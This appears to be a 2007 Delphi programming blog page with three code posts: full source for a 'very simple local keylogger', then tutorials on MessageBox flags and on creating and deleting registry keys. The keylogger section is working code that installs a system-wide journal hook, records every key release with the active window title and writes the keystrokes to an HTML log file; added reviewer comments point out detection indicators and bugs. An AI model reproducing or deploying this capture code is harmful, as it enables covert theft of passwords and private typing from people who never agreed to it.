Simple keylogger in Delphi

March 30, 2007
(******************************************************)
(*                                                    *)
(*        Very Simple Local Keylogger                 *)
(*                                                    *)
(*        See: http://mo4x.com/                       *)
(*                                                    *)
(******************************************************)

unit KeyloggerUnit;

interface

uses
  Windows, Messages, SysUtils, Variants, Controls, Forms, Dialogs,
  StdCtrls, ExtCtrls, Buttons, Classes;

type
  { Main (and only) form of the sample. The component fields below are
    streamed from the .dfm resource, which is not part of this listing;
    presumably the button OnClick events are wired there to the two
    btn...Click handlers - TODO confirm against the .dfm. }
  TMainForm = class(TForm)
    // Working buffer: the hook callback appends one HTML fragment per key event here.
    Memo: TMemo;
    // Triggers btnUpdateLogfileClick (writes log.html).
    btnUpdateLogfile: TSpeedButton;
    // Triggers btnClearLogsClick (empties FinalMemo).
    btnClearLogs: TSpeedButton;
    // Accumulates the document that is saved to log.html.
    FinalMemo: TMemo;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure btnUpdateLogfileClick(Sender: TObject);
    procedure btnClearLogsClick(Sender: TObject);
  end;

var
  // Global form instance; the hook callback reaches the memo through it.
  MainForm: TMainForm;
  // Handle returned by SetWindowsHookEx in FormCreate and released in FormDestroy.
  MainHook : HHOOK;
  // Wnd2 receives the current foreground window title and Wnd1 keeps the
  // previously logged one, so a title is written only when it changes.
  Wnd1,Wnd2 : array[0..255] of char;

implementation

{$R *.dfm}

{ Hook callback that TMainForm.FormCreate registers through
  SetWindowsHookEx(WH_JOURNALRECORD, ...).

  lParam is dereferenced as a pointer to TEventMsg. Only WM_KEYUP events are
  processed: paramL is handed to TranslateKey, which appends an HTML fragment
  for the key to MainForm.Memo. The function always returns 0 and never calls
  CallNextHookEx.

  Reviewer notes for analysts reading this sample:
  - The API combination visible here (a journal hook plus
    GetForegroundWindow/GetWindowText on every key event) is a useful
    behavioural indicator when triaging a binary for input capture.
  - Window titles are concatenated into the HTML output without escaping, so a
    title that contains markup is rendered when log.html is opened in a
    browser. Inspect such a file as plain text. }
function KeyboardHook(Code: Integer; wParam : WPARAM;
  lParam : LPARAM): Longint; stdcall;
var
  Buffer : TEventMsg;

  { Appends the HTML fragment for one virtual-key code to MainForm.Memo.
    The parameter is a Byte, so only values 0..255 reach the case statement.
    No shift or caps-lock state is consulted: letters are always written in
    lower case. }
  procedure TranslateKey(Key : Byte);
  begin
    // Mouse buttons do not trigger the window-title check; they still fall
    // through to the case statement below, where no branch matches them.
    if (Key <> VK_LBUTTON) and (Key <> VK_RBUTTON) then
    begin
      GetWindowText(GetForegroundWindow, Wnd2, SizeOf(Wnd2));
      // Write a heading only when the foreground window title has changed.
      if wnd1 <> wnd2 then
    begin
      // The title goes into the markup unescaped (see the note at the top).
      MainForm.Memo.Lines.Add('<hr><font color="#FFFFFF"><b>'+wnd2+'</b></font><br>');
      Wnd1 := Wnd2;
    end;
    end;
    with MainForm do
    begin
      // Colour coding used by the output: yellow for named control keys,
      // red for punctuation, blue for letters, green for digits.
      case Key of
        VK_RETURN      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Enter]</b><br></font>');
        VK_BACK        :    Memo.Lines.Add('<font color="#FFFF00"><b>[Backspace]</b></font>');
        VK_ESCAPE      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Esc]</b></font>');
        VK_SHIFT       :    Memo.Lines.Add('<font color="#FFFF00"><b>[Shift]</b></font>');
        VK_MENU        :    Memo.Lines.Add('<font color="#FFFF00"><b>[Alt]</b></font>');
        VK_CONTROL     :    Memo.Lines.Add('<font color="#FFFF00"><b>[Ctrl]</b></font>');
        VK_DELETE      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Delete]</b></font>');
        VK_SPACE       :    Memo.Lines.Add(' ');
        VK_MULTIPLY    :    Memo.Text := Memo.Text + '<font color="#FF0000">*</font>';
        VK_ADD         :    Memo.Text := Memo.Text + '<font color="#FF0000">+</font>';
        VK_SUBTRACT    :    Memo.Text := Memo.Text + '<font color="#FF0000">-</font>';
        VK_DECIMAL     :    Memo.Text := Memo.Text + '<font color="#FF0000">.</font>';
        VK_DIVIDE      :    Memo.Text := Memo.Text + '<font color="#FF0000">/</font>';
        188            :    Memo.Text := Memo.Text + '<font color="#FF0000">,</font>';
        192            :    Memo.Text := Memo.Text + '<font color="#FF0000">`</font>';
        222            :    Memo.Text := Memo.Text + '<font color="#FF0000">'+Chr(39)+'</font>';
        // NOTE(review): this branch emits an empty tag; the character inside it
        // was probably lost when the page was published - TODO confirm.
        220            :    Memo.Text := Memo.Text + '<font color="#FF0000"></font>';
        219            :    Memo.Text := Memo.Text + '<font color="#FF0000">[</font>';
        221            :    Memo.Text := Memo.Text + '<font color="#FF0000">]</font>';
        186            :    Memo.Text := Memo.Text + '<font color="#FF0000">;</font>';
        191            :    Memo.Text := Memo.Text + '<font color="#FF0000">/</font>';
        190            :    Memo.Text := Memo.Text + '<font color="#FF0000">.</font>';
        44             :    Memo.Text := Memo.Text + '<font color="#FF0000">,</font>';
        187            :    Memo.Text := Memo.Text + '<font color="#FF0000">=</font>';
        189            :    Memo.Text := Memo.Text + '<font color="#FF0000">-</font>';
        { Letters (codes 65..90), always written in lower case }
        65             :    Memo.Text := Memo.Text + '<font color="#0000FF">a</font>';
        66             :    Memo.Text := Memo.Text + '<font color="#0000FF">b</font>';
        67             :    Memo.Text := Memo.Text + '<font color="#0000FF">c</font>';
        68             :    Memo.Text := Memo.Text + '<font color="#0000FF">d</font>';
        69             :    Memo.Text := Memo.Text + '<font color="#0000FF">e</font>';
        70             :    Memo.Text := Memo.Text + '<font color="#0000FF">f</font>';
        71             :    Memo.Text := Memo.Text + '<font color="#0000FF">g</font>';
        72             :    Memo.Text := Memo.Text + '<font color="#0000FF">h</font>';
        73             :    Memo.Text := Memo.Text + '<font color="#0000FF">i</font>';
        74             :    Memo.Text := Memo.Text + '<font color="#0000FF">j</font>';
        75             :    Memo.Text := Memo.Text + '<font color="#0000FF">k</font>';
        76             :    Memo.Text := Memo.Text + '<font color="#0000FF">l</font>';
        77             :    Memo.Text := Memo.Text + '<font color="#0000FF">m</font>';
        78             :    Memo.Text := Memo.Text + '<font color="#0000FF">n</font>';
        79             :    Memo.Text := Memo.Text + '<font color="#0000FF">o</font>';
        80             :    Memo.Text := Memo.Text + '<font color="#0000FF">p</font>';
        81             :    Memo.Text := Memo.Text + '<font color="#0000FF">q</font>';
        82             :    Memo.Text := Memo.Text + '<font color="#0000FF">r</font>';
        83             :    Memo.Text := Memo.Text + '<font color="#0000FF">s</font>';
        84             :    Memo.Text := Memo.Text + '<font color="#0000FF">t</font>';
        85             :    Memo.Text := Memo.Text + '<font color="#0000FF">u</font>';
        86             :    Memo.Text := Memo.Text + '<font color="#0000FF">v</font>';
        87             :    Memo.Text := Memo.Text + '<font color="#0000FF">w</font>';
        88             :    Memo.Text := Memo.Text + '<font color="#0000FF">x</font>';
        89             :    Memo.Text := Memo.Text + '<font color="#0000FF">y</font>';
        90             :    Memo.Text := Memo.Text + '<font color="#0000FF">z</font>';
        { Numpad Keys }
        VK_NUMPAD0     :    Memo.Text := Memo.Text + '<font color="#00FF00">0</font>';
        VK_NUMPAD1     :    Memo.Text := Memo.Text + '<font color="#00FF00">1</font>';
        VK_NUMPAD2     :    Memo.Text := Memo.Text + '<font color="#00FF00">2</font>';
        VK_NUMPAD3     :    Memo.Text := Memo.Text + '<font color="#00FF00">3</font>';
        VK_NUMPAD4     :    Memo.Text := Memo.Text + '<font color="#00FF00">4</font>';
        VK_NUMPAD5     :    Memo.Text := Memo.Text + '<font color="#00FF00">5</font>';
        VK_NUMPAD6     :    Memo.Text := Memo.Text + '<font color="#00FF00">6</font>';
        VK_NUMPAD7     :    Memo.Text := Memo.Text + '<font color="#00FF00">7</font>';
        VK_NUMPAD8     :    Memo.Text := Memo.Text + '<font color="#00FF00">8</font>';
        VK_NUMPAD9     :    Memo.Text := Memo.Text + '<font color="#00FF00">9</font>';
        { Numbers }
        48             :    Memo.Text := Memo.Text + '<font color="#00FF00">0</font>';
        49             :    Memo.Text := Memo.Text + '<font color="#00FF00">1</font>';
        50             :    Memo.Text := Memo.Text + '<font color="#00FF00">2</font>';
        51             :    Memo.Text := Memo.Text + '<font color="#00FF00">3</font>';
        52             :    Memo.Text := Memo.Text + '<font color="#00FF00">4</font>';
        53             :    Memo.Text := Memo.Text + '<font color="#00FF00">5</font>';
        54             :    Memo.Text := Memo.Text + '<font color="#00FF00">6</font>';
        55             :    Memo.Text := Memo.Text + '<font color="#00FF00">7</font>';
        56             :    Memo.Text := Memo.Text + '<font color="#00FF00">8</font>';
        57             :    Memo.Text := Memo.Text + '<font color="#00FF00">9</font>';
        //to capture other keys you must uncomment the line below:
        //else Memo.Text := Memo.Text + Chr(Key);
      end;
    end;
  end;

begin
  // The Code argument is not inspected; every invocation is treated alike.
  Result := 0;
  // Copy the event record that lParam points to.
  Buffer := PEventMsg(lParam)^;

  // Key-down events are ignored; each key is recorded once, on release.
  if Buffer.Message = WM_KEYUP then
  begin
    TranslateKey(Buffer.paramL);
  end;
end;

{ Runs when the form is created: installs the hook and removes any log file
  left by an earlier run.

  Reviewer notes:
  - The hook type is WH_JOURNALRECORD, registered with this module's hInstance
    and thread id 0. Microsoft documents the journaling hook APIs as
    unsupported starting with Windows 11.
  - The result of SetWindowsHookEx is stored but never checked, so a failed
    installation goes unnoticed by the program.
  - 'log.html' is a relative path, so it resolves against the process's
    current directory; a file of that name next to an unknown executable is a
    simple artefact to look for during triage. }
procedure TMainForm.FormCreate(Sender: TObject);
begin
  MainHook := SetWindowsHookEx(WH_JOURNALRECORD, KeyboardHook, hInstance, 0);
  DeleteFile('log.html');
end;

{ Runs when the form is destroyed: removes the hook installed in FormCreate.
  MainHook is passed on as stored; it is not checked for a failed install. }
procedure TMainForm.FormDestroy(Sender: TObject);
begin
  UnhookWindowsHookEx(MainHook);
end;

{ Appends the content of Memo to FinalMemo, writes FinalMemo to 'log.html'
  and then empties Memo.

  Reviewer notes:
  - The closing '</body>' line is added after SaveToFile, so it is missing
    from the file written by this click and only appears on a later save.
  - FinalMemo is not cleared here; each click adds another '<body ...>' line
    and the file keeps growing until btnClearLogsClick runs.
  - The file is written in plain text to a relative path, and the embedded
    window titles are not HTML-escaped. }
procedure TMainForm.btnUpdateLogfileClick(Sender: TObject);
begin
  //save captured keystrokes to HTML file
  FinalMemo.Lines.Add('<body bgcolor="#000000">');
  FinalMemo.Lines.Add(Memo.Text);
  FinalMemo.Lines.SaveToFile('log.html');
  FinalMemo.Lines.Add('</body>');
  Memo.Clear;
end;

{ Empties FinalMemo. Neither Memo nor the log.html file already on disk is
  touched by this handler. }
procedure TMainForm.btnClearLogsClick(Sender: TObject);
begin
  //clear the logs
  FinalMemo.Clear;
end;

end.

Delphi7 – MessageBox

March 30, 2007
program MsgBoxExample; //program name

uses
  SysUtils, //SysUtils module
  Windows,  //Windows module
  Messages; //Messages module

const
  sCaption = 'MsgBox'; //caption shared by every message box below
var
  iReturnedValue : Integer; //id of the button chosen in the first message box
begin
{
  MessageBox creates, displays and runs a modal message box.
  Use it to tell the user about errors, warnings or plain information.

  Return values of MessageBox:
  0 - the call failed (for example, not enough memory)
  1 - OK button clicked (IDOK)
  2 - Cancel button clicked (IDCANCEL)
  3 - Abort button clicked (IDABORT)
  4 - Retry button clicked (IDRETRY)
  5 - Ignore button clicked (IDIGNORE)
  6 - Yes button clicked (IDYES)
  7 - No button clicked (IDNO)

  Example: ask a yes/no question and react to the answer.
  IDYES and IDNO are the named forms of 6 and 7.
}

  iReturnedValue := MessageBoxA(0,'Choose "Yes" or "No" :)',sCaption,MB_YESNO);
  case iReturnedValue of
    IDYES : MessageBox(0,'You clicked "Yes"!!!',sCaption,MB_OK);
    IDNO  : MessageBox(0,'You clicked "No"!!!',sCaption,MB_OK);
  end;

{
  Buttons and icons are selected through the last parameter.
  Button sets:
  MB_OK = $0
  MB_OKCANCEL = $1
  MB_ABORTRETRYIGNORE = $2
  MB_YESNOCANCEL = $3
  MB_YESNO = $4
  MB_RETRYCANCEL = $5
  So 0 and MB_OK mean the same thing, as do 4 and MB_YESNO, and so on.

  Those are only the button sets. The complete list of flags:
  MB_OK = $0
  MB_OKCANCEL = $1
  MB_ABORTRETRYIGNORE = $2
  MB_YESNOCANCEL = $3
  MB_YESNO = $4
  MB_RETRYCANCEL = $5
  MB_ICONHAND = $10
  MB_ICONQUESTION = $20
  MB_ICONEXCLAMATION = $30
  MB_ICONASTERISK = $40
  MB_USERICON = $80
  MB_ICONERROR = MB_ICONHAND
  MB_ICONINFORMATION = MB_ICONASTERISK
  MB_ICONSTOP = MB_ICONHAND
  MB_ICONWARNING = MB_ICONEXCLAMATION
  MB_DEFBUTTON1 = $0
  MB_DEFBUTTON2 = $100
  MB_DEFBUTTON3 = $200
  MB_DEFBUTTON4 = $300
  MB_APPLMODAL = $0
  MB_SYSTEMMODAL = $1000
  MB_TASKMODAL = $2000
  MB_HELP = $4000
  MB_NOFOCUS = $8000
  MB_SETFOREGROUND = $10000
  MB_DEFAULT_DESKTOP_ONLY = $20000
  MB_TYPEMASK = $0F
  MB_ICONMASK = $0F0
  MB_DEFMASK = $0F00
  MB_MODEMASK = $3000
  MB_MISCMASK = $0C000
  MB_TOPMOST = $40000
  MB_RIGHT = $80000
  MB_RTLREADING = $100000
  MB_SERVICE_NOTIFICATION = $200000

  A small example with raw numbers. The flags occupy separate bit groups,
  so they are combined with "or":
}

  MessageBox(0,'Delphi lernen macht Spaß :)',sCaption,$3 or $30 or $100);

{
  The example above uses:
  $3 = MB_YESNOCANCEL
  $30 = MB_ICONEXCLAMATION
  $100 = MB_DEFBUTTON2

  1. MB_YESNOCANCEL - the buttons are "Yes", "No" and "Cancel".
  2. MB_ICONEXCLAMATION - the icon is the warning icon.
  3. MB_DEFBUTTON2 - the second button is the default (highlighted) one.

  The same call is easier to read with the named constants:
}
  MessageBox(0,'Simple Text ;)',sCaption,MB_YESNOCANCEL or MB_ICONEXCLAMATION or MB_DEFBUTTON2);

end. //end of the code

Delphi7 – Editing Windows Registry

March 30, 2007
program RegEditingExample;   //name of our proggy :)
 
uses
  SysUtils,         //SysUtils module declaration
  Windows,          //Windows module declaration
  Registry,         //Registry module declaration
  Dialogs;

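var                 //variable declarations follow
  Reg : TRegistry;  //VCL wrapper object around the registry API
  S : AnsiString;   //receives the current key path
  H : HKEY;         //raw key handle used by the WinAPI examples

begin               //start of the code.

  //Create the wrapper object. It owns an open key handle, so it is released
  //in the "finally" section below even when one of the calls raises.
  Reg := TRegistry.Create();
  try

    //RootKey [property]
    //Every relative key name below is resolved under HKEY_CURRENT_USER.
    Reg.RootKey := HKEY_CURRENT_USER;

    //OpenKey [function]
    //key : String -> key name
    //CanCreate : Boolean -> if True, a missing key is created.
    //Opens the specified key and makes it the current key.
    //Returns True on success, False otherwise.
    //The result is checked: if the key cannot be opened, the create, move and
    //delete calls below would otherwise act directly under the root key.
    //(For read-only access TRegistry also offers OpenKeyReadOnly.)
    if Reg.OpenKey('Software\Microsoft',False) then
    begin

      //CreateKey [function]
      //Key : String -> registry key name.
      //Creates a new registry key below the current key.
      //Returns True on success, False otherwise.
      Reg.CreateKey('Our_Reg_Key');

      //KeyExists [function]
      //Key : String -> registry key name.
      //Returns True if the key exists, False otherwise.
      Reg.KeyExists('Windows');

      //ValueExists [function]
      //Name : String -> name of the registry value.
      //Returns True if the value exists in the current key, False otherwise.
      Reg.ValueExists('lol2');

      //MoveKey [procedure]
      //OldName : String -> old registry key name
      //NewName : String -> new name of the registry key
      //Delete : Boolean -> if True, the key named OldName is deleted afterwards
      //Moves or copies the key together with its subkeys and values.
      Reg.MoveKey('Our_Reg_Key','Moved_Reg_Key',False);

      //DeleteKey [function]
      //Two keys exist at this point (the created one and its copy);
      //both are removed again.
      //Key : String -> name of the key to delete
      //Returns True on success, False otherwise.
      Reg.DeleteKey('Our_Reg_Key');
      Reg.DeleteKey('Moved_Reg_Key');

      //CurrentPath [property]
      //Holds the path of the current key, for example 'Software\Microsoft'.
      //Here it is copied into "S". To display it, call MessageBox, e.g.:
      //MessageBox(0,PChar('The current path is '+Reg.CurrentPath),'Info',MB_ICONINFORMATION);
      S := Reg.CurrentPath;
    end;

  finally
    //The destructor closes the current key.
    Reg.Free;
  end;

  //WinAPI Registry Functions
  //Not sure what the Windows API is?
  //See: http://en.wikipedia.org/wiki/WinAPI
  //The calls below show the raw API equivalents.

  //RegOpenKey function
  //Opens the specified registry key.
  //hKey - handle to an open registry key
  //lpSubKey - name of the subkey
  //phkResult - variable that receives the handle of the opened key
  //Returns 0 (ERROR_SUCCESS) on success, a nonzero code otherwise (see WinError.h)
  //
  //RegCloseKey function
  //Closes a handle obtained from RegOpenKey or RegCreateKey.
  //hkey - the open handle to close
  //Returns 0 (ERROR_SUCCESS) on success, a nonzero code otherwise (see WinError.h)
  //
  //Example: H is valid only after a successful open, and H (not the
  //predefined HKEY_CURRENT_USER root) is the handle that has to be closed.
  if RegOpenKey(HKEY_CURRENT_USER,'Software\Microsoft',H) = ERROR_SUCCESS then
    RegCloseKey(H);

  //RegCreateKey function
  //Creates a new registry key; if the key already exists it is opened instead.
  //hKey - a handle to a registry key
  //lpSubKey - subkey to create (or open)
  //phkResult - variable that receives the handle of the created/opened key
  //Returns 0 (ERROR_SUCCESS) on success, a nonzero code otherwise (see WinError.h)
  //Example: the returned handle is closed again so it does not leak.
  if RegCreateKey(HKEY_CURRENT_USER,'!Windows Registry Own3d ;)',H) = ERROR_SUCCESS then
    RegCloseKey(H);

  //RegDeleteKey function
  //Deletes the specified registry key.
  //hKey - a handle to a registry key
  //lpSubKey - subkey to delete
  //Returns 0 (ERROR_SUCCESS) on success, a nonzero code otherwise (see WinError.h)
  //Example:
  RegDeleteKey(HKEY_CURRENT_USER,'!Windows Registry Own3d ;)');

  //Dare for more!

end.   //end of the code.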